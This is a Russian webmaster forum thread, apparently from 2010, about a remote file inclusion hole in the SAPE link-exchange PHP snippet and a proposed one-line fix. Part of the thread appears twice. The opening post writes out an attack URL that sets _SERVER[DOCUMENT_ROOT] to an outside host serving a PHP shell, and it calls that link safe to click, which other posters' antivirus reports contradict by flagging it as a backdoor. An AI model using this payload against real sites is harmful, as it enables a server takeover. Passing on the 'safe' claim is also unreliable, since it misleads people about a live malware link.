Уязвимость сайта после вставки кода sape

Shema · 17.04.2010, 18:24

Практика показала, что на некоторых хостингах и для некоторых движков код

Код:

<?php 
     if (!defined('_SAPE_USER')){
        define('_SAPE_USER', 'd56b17c1d94442b8874c6ad44aae3202'); 
     }
     require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); 
     $sape = new SAPE_client();
?>

является уязвимым! А именно строчка
require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');

Злоумышненники, используя запрос вида
http://www.ваш-сайт.ru////?_SERVER[D...afterlife.txt? могут нарушить работу вашего сайта, в том числе рассылать спам от имени вашего сайта.

В качестве строчки после _SERVER[DOCUMENT_ROOT] используется ссылка на код эксплоита (ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно), а заодно проверить, не случится ли чего с вашим сайтом, если его подставить на место www.ваш-сайт.ru).

Решение проблемы на стороне сайта:
заменить

Код:

require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php');

на

Код:

require_once(getenv('DOCUMENT_ROOT').'/'._SAPE_USER.'/sape.php');

Просьба к разработчикам sape проверить, не противоречит ли моя замена чему-либо и, если нет, то обновить код для вставки для всех.

drak · 17.04.2010, 19:56

уходите с хостинга, если вас ломанули.
и гуглите про register globals

MonAmur · 17.04.2010, 20:13

Цитата:

ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно)

каспер не пустил...

Цитата:

Обнаружена угроза:
объект заражен Backdoor.PHP.Rst.f

chahlic · 17.04.2010, 20:16

Цитата:

Сообщение от MonAmur

каспер не пустил...

аналогичная фигня....

afonia · 17.04.2010, 20:25

Это что, такой оригинальный способ распространят вирусы ТС придумал? -)))

Shema · 18.04.2010, 05:01

dark, уходить с хостинга - вариант, переписать движок - тоже вариант (нормально написанный движок и нормально настроенный хостинг такой уязвимости не должны допустить), но если изменить в коде сапы одну строчку, то без потери функциональности проблемы можно избежать (кмк) на любом движке и на любом хостинге.

sylex · 18.04.2010, 07:26

Shema, неизвестно где и сколько еще в твоем сайте таких уязвимостей

Shema · 18.04.2010, 12:19

sylex, конечно, неизвестно.

И кстати проверил все свои сайты - сапа не добавила уязвимостей нормально написанному сайту. А вот затрояненный клиент на поддержку достался - куча сайтов с этой проблемой. А учитывая, что у сапы десятки тысяч сайтов, то даже пара процентов проблемных - это много. Поэтому, считаю, что если можно повысить безопасность кода, это надо сделать.

Ank · 18.04.2010, 19:33

Shema, абсолютно все могут НЕ пользоваться строчкой $_SERVER['DOCUMENT_ROOT'].
Что во первых - не уберет уязвимость, если она есть на этом хостинге.
2 - в приведенном примере что то сапы?

Ну а объяснить как ставить по другому чтобы было понятно ВСЕМ и работало ...

Atomic · 18.04.2010, 19:49

ТС, мои соболезнования, если ваш хост и сайт позволяют подставлять в ГЕт суперглобальные переменные, то...

Цитата:

http://www.xn----7sbbf2b7bj7b.ru////?_SERVER[DOCUMENT_ROOT]=http://jokernet.fileave.com/afterlife.txt?

где там сапа, ума не приложу

17.04.2010, 18:24	#1
Shema Новичок Регистрация: 14.10.2007 Адрес: Москва Сообщений: 10 Вес репутации: 0	Уязвимость сайта после вставки кода sape Практика показала, что на некоторых хостингах и для некоторых движков код Код: <?php if (!defined('_SAPE_USER')){ define('_SAPE_USER', 'd56b17c1d94442b8874c6ad44aae3202'); } require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); $sape = new SAPE_client(); ?> является уязвимым! А именно строчка require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); Злоумышненники, используя запрос вида http://www.ваш-сайт.ru////?_SERVER[D...afterlife.txt? могут нарушить работу вашего сайта, в том числе рассылать спам от имени вашего сайта. В качестве строчки после _SERVER[DOCUMENT_ROOT] используется ссылка на код эксплоита (ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно), а заодно проверить, не случится ли чего с вашим сайтом, если его подставить на место www.ваш-сайт.ru). Решение проблемы на стороне сайта: заменить Код: require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); на Код: require_once(getenv('DOCUMENT_ROOT').'/'._SAPE_USER.'/sape.php'); Просьба к разработчикам sape проверить, не противоречит ли моя замена чему-либо и, если нет, то обновить код для вставки для всех.

17.04.2010, 20:25	#5
afonia Специалист Регистрация: 06.11.2009 Сообщений: 428 Вес репутации: 199	Это что, такой оригинальный способ распространят вирусы ТС придумал? -))) __________________ Самый выгодный курс обмена электронных валют. Pay-Click - лучше тизерной партнерки еще не видел.

18.04.2010, 19:33	#9
Ank Администратор Регистрация: 05.02.2007 Сообщений: 18,405 Вес репутации: 730	Shema, абсолютно все могут НЕ пользоваться строчкой $_SERVER['DOCUMENT_ROOT']. Что во первых - не уберет уязвимость, если она есть на этом хостинге. 2 - в приведенном примере что то сапы? Ну а объяснить как ставить по другому чтобы было понятно ВСЕМ и работало ... __________________ Начать зарабатывать на своих сайтах. Консультирую своих рефов по аське Читаем ФАК

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Нужен php-скрипт для вставки текста	SergejF	Разработка и сопровождение сайтов	8	15.04.2010 23:09
Взлом сайта с установкой кода sape	Paffy	Вопросы по работе системы	4	31.01.2009 17:12
Проблема с индексацией страниц после обновления кода sape для контекстных ссылок	serp	Ошибки при работе с системой	0	06.03.2008 14:29
После установки кода sape сайты выпали из yandexa	mgpetrov	Яндекс	9	27.06.2007 16:44
полная замена движка сайта: порядок переноса кода SAPE?	saddat	Вопросы по работе системы	23	30.04.2007 10:23

17.04.2010, 19:56	#2
drak Специалист Регистрация: 09.12.2009 Сообщений: 193 Вес репутации: 0	уходите с хостинга, если вас ломанули. и гуглите про register globals

18.04.2010, 05:01	#6
Shema Новичок Регистрация: 14.10.2007 Адрес: Москва Сообщений: 10 Вес репутации: 0	dark, уходить с хостинга - вариант, переписать движок - тоже вариант (нормально написанный движок и нормально настроенный хостинг такой уязвимости не должны допустить), но если изменить в коде сапы одну строчку, то без потери функциональности проблемы можно избежать (кмк) на любом движке и на любом хостинге.

18.04.2010, 07:26	#7
sylex Специалист Регистрация: 19.11.2009 Сообщений: 157 Вес репутации: 196	Shema, неизвестно где и сколько еще в твоем сайте таких уязвимостей

18.04.2010, 12:19	#8
Shema Новичок Регистрация: 14.10.2007 Адрес: Москва Сообщений: 10 Вес репутации: 0	sylex, конечно, неизвестно. И кстати проверил все свои сайты - сапа не добавила уязвимостей нормально написанному сайту. А вот затрояненный клиент на поддержку достался - куча сайтов с этой проблемой. А учитывая, что у сапы десятки тысяч сайтов, то даже пара процентов проблемных - это много. Поэтому, считаю, что если можно повысить безопасность кода, это надо сделать.